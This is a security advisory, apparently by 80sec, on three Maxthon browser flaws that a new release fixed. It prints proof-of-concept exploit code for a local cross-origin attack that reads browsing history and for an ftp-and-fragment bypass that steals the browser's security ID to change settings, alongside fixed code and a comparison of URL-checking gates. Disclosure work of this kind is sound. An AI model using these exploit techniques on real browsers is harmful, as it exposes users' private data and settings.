After 80sec reported the security vulnerabilities to Maxthon, Maxthon released a new browser version on 6.30 that fixes the vulnerabilities described below. For details, see http://blog.maxthon.cn/. The three security issues have been updated; the main points are as follows:
Vulnerability Source: http://www.80sec.com/release/maxthon-vulns-poc.txt
1. Local cross-origin vulnerability caused by a browser kernel vulnerability
Vulnerability description: Maxthon uses the system's IE kernel, and that kernel may contain security vulnerabilities that allow cross-origin attacks. Maxthon's own domains such as max: are treated locally as equivalent to file://, so such a cross-origin attack leads to JavaScript being executed in the local context. Only a PoC that reads the browsing history is given here.
Vulnerability POC:
<a href="">Maxthon Exploit</a>
<script>
function win(){
x=window.open("max:history");
setTimeout(function(){
x.location=new String("javascript:x=maxHistory.history.list.site.loadData();for(i=0;i<x.length;i++) document.write(x[i].site+'<br>');")
},3000)
}
window.onload=function(){
for (i=0;i<document.links.length;i++) {
document.links[i].href="javascript:win()"
}
}
</script>
Vulnerability fix: The new Maxthon version fixes this security vulnerability ahead of any fix to the IE kernel itself.
2. Remote modification of arbitrary user settings caused by a security center vulnerability
Vulnerability description: Maxthon does not fully understand some features of the IE kernel, which leads to security vulnerabilities in certain special situations. The Maxthon control center is actually a set of HTML + JavaScript pages. Through these pages one can read sensitive data, modify browser settings and download files. Of course Maxthon has its own security policy: HTML files placed on an external site cannot call them directly, because Maxthon has a security control policy, security.src, whose code is as follows:
var max_security_id="";
var url=String(document.location).toLowerCase();
if(url.indexOf("file://")>-1&&url.indexOf("http://")==-1&&url.indexOf("https://")==-1){
  max_security_id="{B73B3AC9-B009-4429-AE67-514332D791FE}";
}else{
  document.location="about:blank";
}
max_security_id is a parameter Maxthon requires when calling its various controls. It is needed by all of those functions, and the max_security_id differs from machine to machine. If we can obtain this max_security_id, we can call the various functions from any remote site: change settings, read sensitive data and even execute remote code.
First, this max_security_id appears to change on every start. It is stored in template/security.src under the installation directory, and we can make the following calls from a page on our own site:
<script src="E:\Program Files\Maxthon2\template\security.src"></script>
<script src="D:\Program Files\Maxthon2\template\security.src"></script>
<script src="C:\Program Files\Maxthon2\template\security.src"></script>
Don't be surprised: Maxthon allows local files to be called this way :), but security.src is itself restricted. The value is assigned only when the location contains file:// and contains neither http:// nor https://; otherwise the page is redirected. The mistake here is that the blacklist policy still allows other protocols such as ftp://, and it is just as easy to include file:// in the location:
ftp://www.foo.com/exploit.html#file://80sec.com
In this example the address contains exploit.html, but the location also contains file://. Once the security policy is sidestepped this way, max_security_id can be obtained, and with max_security_id all operations can be performed.
Vulnerability PoC:
Set up an anonymous FTP server www.foo.com and make the following reference from a malicious site:
<iframe src="ftp://www.foo.com/history/index.htm#file:///www.80sec.com" width=100% height=100%></iframe>
In /history/index.htm:
<script type="text/javascript" src="../security.src"></script>
Change this to:
<script src="E:\Program Files\Maxthon2\template\security.src"></script>
<script src="D:\Program Files\Maxthon2\template\security.src"></script>
<script src="C:\Program Files\Maxthon2\template\security.src"></script>
By modifying the content of index.htm you can then modify the browser settings and read the history.
Vulnerability fix: The new version changes the code to
var max_security_id="";
if(String(window.document.location).toLowerCase().indexOf("file://")==0){
  max_security_id="{02E14D94-53C8-4B6D-89AE-755DC5299C6C}";
}else{
  document.location="about:blank";
}
Now only local files can reference this JS file, which fixes the problem.
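The difference between the blacklist check and the prefix check is easiest to see when both are run over the same set of locations. The following is an added example written for this page; it is not Maxthon's code and not part of the 80sec advisory. The two gate functions reproduce the pre-fix and post-fix logic quoted above, the third (schemeGateAllows, my own addition) shows the more general approach of parsing the URL and comparing the scheme instead of searching substrings, and the sample locations are constructed, including the ftp://...#file:// bypass from the advisory.

```javascript
// Added example, not Maxthon's code: the two security.src gates from the
// advisory side by side, plus a parser-based variant, run over sample URLs.

// Pre-fix gate (blacklist): passes any location that merely *contains*
// "file://" somewhere and contains neither "http://" nor "https://".
function legacyGateAllows(location) {
  const url = String(location).toLowerCase();
  return url.indexOf("file://") > -1 &&
         url.indexOf("http://") === -1 &&
         url.indexOf("https://") === -1;
}

// Post-fix gate (prefix check): "file://" must be at position 0.
function fixedGateAllows(location) {
  return String(location).toLowerCase().indexOf("file://") === 0;
}

// Parser-based variant (my addition, not from the advisory): let the URL
// parser decide what the scheme is, then allow only the file: scheme.
// Unparseable input is rejected rather than guessed at.
function schemeGateAllows(location) {
  let parsed;
  try {
    parsed = new URL(String(location));
  } catch (e) {
    return false;
  }
  return parsed.protocol === "file:";
}

// Constructed sample locations covering the cases the advisory discusses.
const BYPASS = "ftp://www.foo.com/exploit.html#file://80sec.com";
const SAMPLES = [
  "file:///C:/Program Files/Maxthon2/template/security.src", // genuine local page
  "http://evil.example/index.htm",                            // plain remote page
  "https://evil.example/index.htm",                           // plain remote page (TLS)
  BYPASS,                                                     // non-http scheme, file:// in fragment
  "FILE:///C:/local.htm",                                     // upper-case scheme, still local
];

// Returns a map of sample location -> whether the given gate would hand
// out max_security_id for it.
function evaluate(gate) {
  const allowed = {};
  for (const s of SAMPLES) allowed[s] = gate(s);
  return allowed;
}

// Lists the samples a gate allows even though their scheme is not file:,
// i.e. the cases where the gate can be bypassed.
function bypassedBy(gate) {
  return SAMPLES.filter((s) => gate(s) && !schemeGateAllows(s));
}

// Stand-alone run: print the verdict of each gate per sample.
for (const [name, gate] of [["legacy", legacyGateAllows],
                            ["fixed", fixedGateAllows],
                            ["scheme", schemeGateAllows]]) {
  console.log(name, evaluate(gate), "bypassed by:", bypassedBy(gate));
}
```

The legacy gate allows the ftp location because the substring search finds file:// inside the fragment, while both the prefix check and the parser-based check reject it; the parser-based variant also avoids having to think about casing or where in the string the scheme token may appear.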
3. Cross-site scripting vulnerability in RSS subscriptions
Vulnerability description: Because of a flaw in how the RSS function is implemented, an XSS vulnerability is triggered when a crafted page is accessed.
Vulnerability PoC: subscribe to http://www.80sec.com/feed to see the effect :)
Vulnerability fix: Fixed in the new version.
Maxthon is very rigorous in dealing with vulnerabilities. We hope Maxthon users upgrade to the new version as soon as possible.
The content on this site is original; when reprinting, be sure to keep the author's signature and links!
Several security vulnerabilities fixed by Maxthon:
http://www.80sec.com/maxthon-vulns-poc.html